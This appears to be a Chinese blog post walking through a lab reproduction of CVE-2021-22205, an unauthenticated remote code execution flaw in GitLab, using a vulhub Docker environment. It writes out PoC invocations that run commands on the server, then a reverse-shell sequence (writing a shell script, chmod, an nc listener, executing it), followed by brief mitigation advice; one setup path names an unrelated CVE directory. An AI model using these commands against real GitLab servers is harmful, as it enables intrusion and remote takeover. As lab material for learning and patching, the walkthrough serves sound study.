【vulhub系列】CVE-2021-22205 GitLab 未授权RCE复现

已于 2022-10-04 20:23:07 修改
阅读量1k 收藏 1
点赞数
分类专栏: 记录一下vulhub靶场复现 文章标签: 安全 网络安全 gitlab
于 2022-10-01 00:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Wiofgb/article/details/127123332
版权

最近在准备ctf比赛,抽出时间复现了该漏洞,希望各位大佬多多指导。顺便求一位会ctfweb方面的大佬指点一下,不用多厉害,我ctfweb方面就是小白。。。。

文章目录

  • 漏洞信息
  • 影响版本
  • gitlab漏洞环境
  • shell反弹
  • 修改方案

漏洞信息

GitLab是一款Ruby开发的Git项目管理平台。如11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204ExifTool CVE-2021-22204 - Arbitrary Code Execution | devcraft.ioBackgroundhttps://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html)的影响,攻击者可以通过一个未授权的接口上传一张恶意构造的图片,进而在GitLab服务器上执行命令。

影响版本
11.9 <= Gitlab CE/EE < 13.8.8
13.9 <= Gitlab CE/EE < 13.9.6
13.10 <= Gitlab CE/EE < 13.10.3

gitlab漏洞环境
使用vulhub的docker环境

vulhub地址:Vulhub - Docker-Compose file for vulnerability environment

搭建过程

  1. 进入目标目录:cd /root/桌面/vulhub-master/metabase/CVE-2021-41277/
  2. 打开dockers容器:docker-compose up -d
  3. 查看主机IP地址:ifconfig
  4. 查看容器开启的端口:docker ps
  5. 地址加端口查看服务:http://192.168.162.129:8080

使用自带poc创建文件:

python poc.py http://192.168.162.129:8080 "touch /tmp/hello"

示例:

 查看文件是否创建成功:

docker ps
docker exe -it ID(该id为docker ps查看到的第一个) /bin/bash
cd /tmp
ls

示例:

 发现hello文件,文件上传成功。

shell反弹

下载POC:

poc下载地址

将poc下载后拉入kali虚拟机内,在poc位置打开终端,检测漏洞是否存在。

python CVE-2021-2205.py -v true your-ip:8080

示例:

 

 创建.sh文件:

反弹shell一键写成

python CVE-2021-2205.py -a true -t your-ip:8080/ "echo'反弹shell命令' >/shell.sh"

 

 返回刚刚查看文件是否上传成功的终端再次查看文件是否上传成功:

直接ls命令查看:

示例:

 对刚刚上传的shell.sh文件进行提权:

python CVE-2021-2205.py -a true -t your-ip:8080/ -c "chmod +x /tmp/shell.sh"

 示例:(shell文件变成绿色,证明提权成功)

 到nc所在虚拟机打开nc监听(我这里是又启用了一台win7虚拟机进行nc监听)

nc -lvnp 22314

 进行shell反弹:

python CVE-2021-2205.py -a true -t your-ip:8080/ -c "/bin/bash /tmp/shell.sh"

示例:

反弹shell成功

示例: 

 至此,漏洞复现结束。

 修改方案

1、及时升级GitLab至最新安全版本

2、配置访问控制策略,避免受影响的GitLab暴露在公网

一只学网安的小白。
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Gitlab无需认证RCE漏洞CVE-2021-22205)
千寻的博客
11-15 4025
文章目录gitlab介绍漏洞介绍漏洞编号漏洞等级影响版本FOFA 查询环境搭建(vulhub环境搭建)漏洞第一步 漏洞检测第二步 dnslog解析第三步 服务器写入文件第三步 反弹shell修建议免责声明摘抄 gitlab介绍 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。 GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。 漏洞介绍 由于 GitL
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter授权RCECVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
CVE-2021-22205——Gitlab 远程命令执行漏洞,2024年最新美团架构师深入讲解网络安全开发
最新发布
2301_76225520的博客
04-17 167
parser.add_argument(’-t’, ‘–target’, type=str, help=’ 目标URL ')print(“[-] 目标 {} 不存在漏洞”.format(target_url))print(“[-] 目标 {} 不存在漏洞”.format(target_url))print(”[+] 目标 {} 存在漏洞".format(target_url))print(”[+] 目标 {} 存在漏洞".format(target_url))nc监听10000端口。
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像,使用以下命令标记该映像并将其推送到Dockerhub。 docker login docker build -t validationwebhook:1.0 . docker tag validationwebhook:1.0 darryk/dev:1.0 docker push darryk/dev:1.0 在,您可以将使用Node.js应用程序创建的映像部署到您的K8s集群中。 webhook-deploy.yaml将在群集中部署所有必需的组件。 kubectl apply -f webhook-d
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972 工作于 VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark: 对于vCenter6.7 U2 + vCenter 6.7U2 +在内存中运行网站,因此此Exp不适用于6.7 u2 +。 需要测试 vCenter 6.5 Linux(VCSA)/窗口等待测试 vCenter 6.7 Linux(VCSA)/窗口等待测试 vCenter 7.0 Linux(VCSA)/窗口等待测试 细节 突破为任意文件上传 存在问题的接口为/ui/vropspluginui/rest/services/uploadova ,完整路径( https://domain.com/ui/vropspluginui/r
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE漏洞-CVE-2021-22205 GitLab授权 RCE
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-27 1204
2021年4月15日,GitLab官方发布安全补丁更新修GitLab命令执行漏洞(CVE-2021-22205)。由于GitLab中的ExifTool没有对传入的图像文件的扩展名进行正确处理,攻击者通过上传特制的恶意图片,可以在目标服务器上执行任意命令,且发由于GitLab存在授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影响,CVSS评分为9.9。
Gitlab 授权RCECVE-2021-22205)漏洞分析及排查
dayouzi的博客
08-11 691
GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。但漏洞版本中,GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行。
CVE-2021-22205 GitLab 授权RCE
weixin_46137328的博客
11-25 6237
0x00 漏洞简介GitLab是一款Ruby开发的Git项目管理平台。如11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204的影响,攻...
GitLab 远程命令执行漏洞(CVE-2021-22205)
Bird&Bird
12-02 4317
目录一、漏洞描述二、影响版本三、环境搭建四、漏洞4.1、脚本4.1.1、下载利用脚本 一、漏洞描述 GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行,可执行系统命令。这是一个严重的问题。它在在最新版本中得到缓解,漏洞编号CVE-2021-22205。 二、影响版本 11.9 <= GitLab(CE/EE)< 13.8.8 13.9 <= GitLab(CE/EE)< 13.9.6 13.10 <= GitLab(CE/EE)< 13
CVE-2021-22205 GitLab 远程命令执行漏洞
qq_50854662的博客
01-05 523
CVE-2021-22205 GitLab 远程命令执行漏洞
CVE-2021-22192:CVE-2021-22192靶场:授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:授权用户RCE漏洞 0x10靶场环境 0x20目录结构 CVE-2021-22192 ├── README.md ............... [此 README 说明] ├── imgs .................... [辅助 README 说明的图片] ├── gitlab .................. [Gitlab 容器的挂载目录] │ ├── Dockerfile .......... [Gitlab 的 Docker 构建文件] │ ├── config .............. [Gitlab 配置挂载目录] │ ├── data ................ [Gitlab 数据挂载目录] │ ├── logs ................ [Gitlab
CVE-2021-22205——Gitlab 远程命令执行漏洞
LiBai'S BLOG
11-10 8534
CVE-2021-22205Vuln Impact影响版本环境Fofa语法漏洞利用脚本反弹ShellEXP Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a .
Gitlab 远程命令执行RCE漏洞CVE-2021-22205附exp
god_Zeo的安全博客
10-31 5895
0x01 漏洞介绍&原理 GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,是一款Ruby开发的Git项目管理平台。由于在11.9以后的GitLab中,使用了图片处理工具ExifTool,而此图片处理工具又受到了漏洞CVE-2021-22204的影响: 漏洞触发ExifTool功能处,ExifTool是用于从图像中移除元数据的开源工具,在解析上传图像中的元数据时,并没有完全解析某些元数据,导致攻击者上传带有恶意元数据的图片,从而导致远程命令执行。 攻击者可以通过一个存在
【漏洞CVE-2021-22205 GitLab 授权RCE
Adminxe的博客
10-31 934
0x00 漏洞简介: 漏洞出来第一时间,听漏洞浍测的朋友传来的情报,就及时给了POC,但一直没,只是简单看了文章,提到需要可以注册用户才能进行攻击,然后就感觉挺鸡肋,没有再继续看。 恰巧好基友涛子给我发来他的文章,看了看exp,感觉并没那么鸡肋,相反可以通过授权进行权限的获取,正好自己也了一手,同时借用涛子的文章给大家展了出来。 GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。 GitLab是一款Ruby开发的G..
GitLab 严重漏洞在野被广泛利用,企业需立即自查
ZL_1618的博客
08-17 122
4.1 事件总结本次事件是通过免费社区蜜罐 HFish、OneEDR 在收集终端的进程、网络、文件等系统行为发的,通过 OneEDR的智能关联功能,可了解到安全事件的上下文以及主机、账号、进程等信息,通过“进程链”快速掌握事件的影响范围以及事件的概括,从而精准溯源。HFish 是一款基于 Golang 开发的社区免费蜜罐,可提供多种网络服务和 Web 应用模拟。OneEDR。
CVE-2021-22205 Gitlab exiftool远程命令执行
weixin_45715461的博客
07-13 843
CVE-2021-22205 Gitlab exiftool远程命令执行
vulhubCVE-2022-22947
10-13
CVE-2022-22947漏洞,需要先在vulhub上搭建一个运行着vBulletin 5.6.4版本的环境。然后,通过发送特制的HTTP请求,即可触发漏洞,导致远程代码执行。 具体步骤如下: 1. 在vulhub上下载并启动vBulletin 5.6.4环境。 2. 使用工具生成特制的HTTP请求,其中包含恶意代码。 3. 将HTTP请求发送给vBulletin服务器,即可触发漏洞。 4. 漏洞触发后,攻击者可以在服务器上执行任意代码,获取敏感信息等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值